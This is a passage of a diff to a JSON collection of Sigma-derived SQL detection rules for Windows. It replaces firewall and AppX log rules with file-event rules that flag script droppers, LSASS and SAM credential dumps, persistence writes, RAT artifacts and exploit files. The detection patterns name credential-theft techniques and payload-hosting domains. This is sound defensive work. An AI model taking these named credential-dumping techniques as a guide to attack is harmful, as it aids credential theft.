Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_terminalservices_rdp_ngrok.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "New Firewall Rule Added In Windows Firewall Exception List", - "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "status": "experimental", - "description": "Detects when a rule has been added to the Windows Firewall exception list", - "author": "frack113", - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2004' AND NOT ((Action = '2') OR 
((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], - "filename": "win_firewall_as_add_rule.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT 
((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", - "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", - "status": "experimental", - "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", - "author": "frack113", + "title": "Startup Folder File Write", + "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", + "status": "test", + "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "falsepositives": [ + "FP could be caused by legitimate application writing shortcuts for example. 
This folder should always be inspected to make sure that all the files in there are legitimate" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2006' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" ], - "filename": "win_firewall_as_delete_rule.yml" + "filename": "file_event_win_startup_folder_file_write.yml" }, { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1105" + ], + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' 
ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "Deployment Of The AppX Package Was Blocked By The Policy", - "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by the local computer policy", - "author": "frack113", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Rare cases of administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_policy_block.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious AppX Package Installation Attempt", - "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "description": "Detects suspicious files created via the OneNote application. 
This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Legitimate AppX packages not signed by MS used part of an enterprise" + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Deployment AppX Package Was Blocked By AppLocker", - "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", 
"status": "experimental", - "description": "Detects an appx package deployment that was blocked by AppLocker policy", - "author": "frack113", - "tags": [ - "attack.defense_evasion" - ], + "description": "Detects windows executables that writes files with suspicious extensions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_applocker_block.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "Potential Malicious AppX Package Installation Attempts", - "id": 
"09d3b48b-be17-47f5-bf4e-94e7e75d09ce", - "status": "experimental", - "description": "Detects potential installation or installation attempts of known malicious appx packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE 
'%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" ], - "filename": "win_appxdeployment_server_mal_appx_names.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename 
LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Uncommon AppX Package Locations", - "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" ], - "filename": "win_appxdeployment_server_uncommon_package_locations.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "WMI Persistence", - "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "title": "LSASS Memory Dump File 
Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_wmi_persistence.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Sysinternals Tools AppX Versions Execution", - "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", + "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", + "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "status": "experimental", - "description": "Detects execution of Sysinternals tools via an AppX package. 
Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell creating a binary executable or script file.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the applications from the Windows Store" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" + "filename": "file_event_win_powershell_drop_binary.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": 
"7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", - "id": "31d68132-4038-47c7-8f8e-635a39a7c174", - "status": "test", - "description": "Detects potential Active Directory enumeration via LDAP", - "author": "Adeem Mawani", + "title": "Office Macro File Download", + "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", + "status": "experimental", + "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", + 